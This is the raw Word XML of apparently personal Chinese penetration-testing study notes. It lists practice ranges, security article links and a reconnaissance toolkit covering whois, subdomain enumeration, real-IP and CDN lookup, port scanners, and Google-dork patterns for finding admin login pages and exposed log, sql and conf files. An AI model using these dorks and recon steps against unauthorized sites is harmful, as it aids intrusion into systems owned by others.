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B7B3F" w14:textId="13764BF7" w:rsidR="0039127E" w:rsidRDefault="0039127E" w:rsidP="00FB531E">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="005A3B24">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://www.anantest.com:8086/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场实战（好友搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A45B0D" w14:textId="7DD3CBE1" w:rsidR="0045396C" w:rsidRDefault="0039127E" w:rsidP="00FB531E">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="005A3B24">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/thread-35887-1-1.html?from=beef</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB531E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透测试 （寒假练手）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D45DE55" w14:textId="77777777" w:rsidR="00FB531E" w:rsidRDefault="00BB3AB0" w:rsidP="00FB531E">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00FB531E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.ichunqiu.com/battalion?t=2&amp;r=54399</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB531E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场</w:t>
      </w:r>
      <w:r w:rsidR="009415C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F5033" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/web/213675.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45648EF7" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/vuls/211847.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD7CC9" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3"/>
    <w:p w14:paraId="0F3909CF" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39F510" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/web/160883.html 用户密码重置凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B1664" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t xml:space="preserve">https://www.freebuf.com/articles/database/161495.html  重置凭证接收端可篡改 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916E147" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3"/>
    <w:p w14:paraId="5DCD50A9" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>freebuf寻找文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289C4481" w14:textId="77777777" w:rsidR="0045396C" w:rsidRDefault="0045396C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFCCBED" w14:textId="77777777" w:rsidR="009415C3" w:rsidRDefault="009415C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36280C61" w14:textId="77777777" w:rsidR="0045396C" w:rsidRDefault="0045396C" w:rsidP="00972178">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396FB171" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习看漏洞的文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF70B7A" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00BB3AB0" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00F76936" w:rsidRPr="00B01FDE">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/forum.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C800F79" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F769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知社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE9216" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F769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乌云</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10973D06" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FREEBUF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CB94B" w14:textId="77777777" w:rsidR="00F76936" w:rsidRPr="00CA7E51" w:rsidRDefault="00F76936" w:rsidP="00F769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墨者文章资料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D28DF" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr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ool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hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00A9439B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.t00ls.net/Penetration-articles.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7385B672" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB51F89" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E87A8CF" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5563BF2D" w14:textId="1DDF4165" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息收集：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC7677" w14:textId="49E1237A" w:rsidR="004656A4" w:rsidRDefault="00BB3AB0" w:rsidP="004656A4">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="004656A4" w:rsidRPr="008349A2">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/215182.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4529A60A" w14:textId="77777777" w:rsidR="004656A4" w:rsidRPr="004656A4" w:rsidRDefault="004656A4" w:rsidP="004656A4"/>
    <w:p w14:paraId="6EAA011A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ois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF947E5" w14:textId="77777777"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长之家：</w:t>
      </w:r>
      <w:hyperlink r:id="rId14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//whois.chinaz.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847E300" w14:textId="77777777"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ugscaner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId15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//whois.bugscaner.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC436E" w14:textId="77777777"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爱站网：</w:t>
      </w:r>
      <w:hyperlink r:id="rId16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17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.aizhan.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="551390ED" w14:textId="77777777"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国外在线：</w:t>
      </w:r>
      <w:hyperlink r:id="rId18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19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//bgp.he.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AABB640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总域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BB381" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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企查查：</w:t>
      </w:r>
      <w:hyperlink r:id="rId20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www.qichacha.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2382D" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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备案查询网：</w:t>
      </w:r>
      <w:hyperlink r:id="rId21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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.beianbeian.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1651E7CC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子域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F364198" w14:textId="77777777"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neForAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId23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24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/shmilylty/OneForAll</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F7F3ECF" w14:textId="77777777"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bDomainsBrute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId25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26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/lijiejie/subDomainsBrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F9955D5" w14:textId="77777777"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blist3r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId27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28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/aboul3la/Sublist3r</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="087E7C90" w14:textId="77777777"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NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>二进制搜索：</w:t>
      </w:r>
      <w:hyperlink r:id="rId29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dns.bufferover.run/dns </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> q </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> .baidu.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D4BEB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旁站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD66BA3" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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：</w:t>
      </w:r>
      <w:hyperlink r:id="rId32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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//stool.chinaz.com/same</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68EC0A07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真实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4249A920" w14:textId="77777777"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ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>检测：</w:t>
      </w:r>
      <w:hyperlink r:id="rId34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35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.wepcc.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EEA10C3" w14:textId="77777777"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国外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId36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37" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//asm.ca.com/en/ping.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1491BE0B" w14:textId="77777777"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ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>检测：</w:t>
      </w:r>
      <w:hyperlink r:id="rId38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39" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//tools.ipip.net/dns.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36345E20" w14:textId="77777777"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Xcdn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId40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41" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/3xp10it/xcdn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="120BB8F6" w14:textId="77777777"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在线：</w:t>
      </w:r>
      <w:hyperlink r:id="rId42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43" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//webiplookup.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66C365D8" w14:textId="77777777"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etcraft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId44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toolbar.netcraft.com/site_report </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>?</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> url </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7126FD50" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00BB3AB0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hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>网址</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F76936">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F76936">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//crt.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FD0CAD6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入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>+ C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08027FC9" w14:textId="77777777"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火狐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谷歌插件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED083A" w14:textId="77777777"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map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId50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51" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//nmap.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A617A7A" w14:textId="77777777"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asscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId52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53" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/robertdavidgraham/masscan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48A47941" w14:textId="77777777"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工具：御剑高速端口扫描工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC91C5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敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0126A2" w14:textId="77777777"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ooglehack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633D630" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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后台地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACD843" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>管理后台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登陆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管理员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系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF16099" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx inurl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：登录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管理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系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ guanli /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>登路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913BAC1" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F04A9E" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>文件类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>pdf / doc / xls / txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B5455" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xxx.xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>文件类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>log / sql / conf</w:t>
      </w:r>
    </w:p>
